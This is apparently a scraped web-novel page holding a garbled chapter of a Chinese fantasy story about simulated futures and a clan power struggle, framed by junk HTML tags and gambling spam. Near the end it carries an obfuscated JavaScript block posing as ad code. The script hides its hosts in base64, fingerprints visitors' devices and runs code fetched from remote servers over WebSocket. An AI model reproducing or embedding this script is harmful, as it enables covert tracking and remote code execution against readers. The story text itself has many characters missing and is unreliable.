<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var>
<menuitem id="ztzh5"></menuitem>
<menuitem id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></menuitem>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var><var id="ztzh5"></var>
<var id="ztzh5"><dl id="ztzh5"></dl></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<var id="ztzh5"></var>
<var id="ztzh5"></var>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var> <menuitem id="ztzh5"></menuitem>
<var id="ztzh5"><strike id="ztzh5"><listing id="ztzh5"></listing></strike></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<var id="ztzh5"><strike id="ztzh5"></strike></var>
<cite id="ztzh5"><video id="ztzh5"><listing id="ztzh5"></listing></video></cite>
<menuitem id="ztzh5"></menuitem>
最新網址:www.jsong.org

《玄幻:我用無限模擬人生茍到無敵》轉載請注明來源:博愛書屋www.jsong.org

?,葉塵被眾支持長老簇擁,希望葉塵阻止葉驍。

修羅界瀅水山莊救,因副族長帝。

葉塵果走,葉塵必危險,且管葉塵族內,瀅水山莊,防御薄弱候,葉驍長計議。

住處,葉塵緩緩坐王詡,:「王詡哥,眼該怎辦才?」

先穩定住帝修,應該,重。」王詡靠門框回答。

被殺支持支持葉驍,必須。」

機閣推算。」葉塵

王詡,轉身跟葉塵進房間,見葉塵喚機閣推算候,,王詡等待

況很處理,葉塵,白帝,白帝閉關,正關鍵刻,果葉塵再,葉驍必偷襲白帝,候白帝功虧

機閣內,展推演,葉塵幅幅光景與畫萬萬接受

推演忍住,帶瀅水山莊,母親被葉驍帶追殺,葉驍親攔住王詡,,隨白帝給殺死被葉驍拿

機閣模擬器,線索,葉塵推演結果,垂頭喪氣

,王詡推演順利,:「,別氣餒,慢慢。」

「王詡哥,葉驍,真!」捏緊拳頭:「王詡哥,您推演推演推演力,機閣遠力,嗎?……」

王詡長長吐口氣,點頭:「吧。」

,王詡揮模擬器。

【25歲,龍界,陷入內斗危機。】

【三,龍界,向葉,目標直指與葉塵,葉驍除掉,便。】

【由斬殺與葉塵遭受瘋狂追殺。】

先回弒血門,法避追殺,隱藏葉驍,葉塵逃跑身負重傷。】

徹底解決問題,法離龍界陸,由逃跑轉進攻,依靠法則,連斬數位封號帝,終利崩壞,徹底毀滅。】

打算葉驍等候,葉驍卻拿白帝威脅,葉驍偷襲白帝,使白帝重傷比虛弱,終白帝***場,沖冠,與葉驍展決。】

散帝與葉驍打法防御通鑼鼓,被傷,重傷葉塵逃遁走。】

【模擬結束。】

此次模擬結果,王詡禁皺眉頭。

萬龍祖墓內被殺吧,怎,莫非臨死傳信?

管怎

,怕改變

葉驍,王詡覺準備準備。

叫醒白帝,縱白帝恢復封號帝,慘死葉驍王詡突破修再像間,應該安全

間,王詡始模擬修煉。

【檢測宿主身量真氣團寶,枚封號帝級別金丹,已進優修煉路線規劃。】

【此次修煉需等待間六月,宿主始修煉。】

王詡選擇禁深吸口氣,次突破間,次居月,帝比散帝難度真

月,即便特殊空間內,間。

「呼,決定吧,先離。」王詡長長吐口氣。

,葉塵走臉希冀王詡,問:「王詡哥,?」

樂觀。」王詡招讓葉塵靠近,認真:「推演特殊況,三麻煩,葉驍順坡交給,便,雖滅掉白帝卻被葉驍偷襲,逃走,息***死。」

「什!」葉塵吃驚雙眼。

王詡:「逆轉,三,馬找白帝,田宇胡琛修羅界營救帝,先離龍界,先弒血門,再做打算。」

嗎?安全回弒血門?」葉塵問。

葉驍,等聯合更麻煩。」

葉塵言,立刻點點頭,迅速轉身,離住處,直奔白帝閉關方。

王詡門口站,捏緊拳頭,等回弒血門間,兩,修進入帝境界,便找瀅水山莊,帝給救候隨帝再回龍界。

王詡管,厲害!

陽冬十月提示您:看后求收藏(博愛書屋www.jsong.org),接著再看更方便。

美女直播間 | 免費看直播APP
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE3Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6e\x5a\x79\x66\x4a\x72\x42\x51\x44']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2xkZmtqcy54ZmdjdGcuYY29t','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['Y','N']);}:function(){};
玄幻相關閱讀More+

我真沒想搶

千寬

逆天邪神

火星引力

我真的是反派啊

情史盡成悔

人道大圣

莫默

萬古神帝

飛天魚

全職法師之終焉降臨

李浮塵
外围体育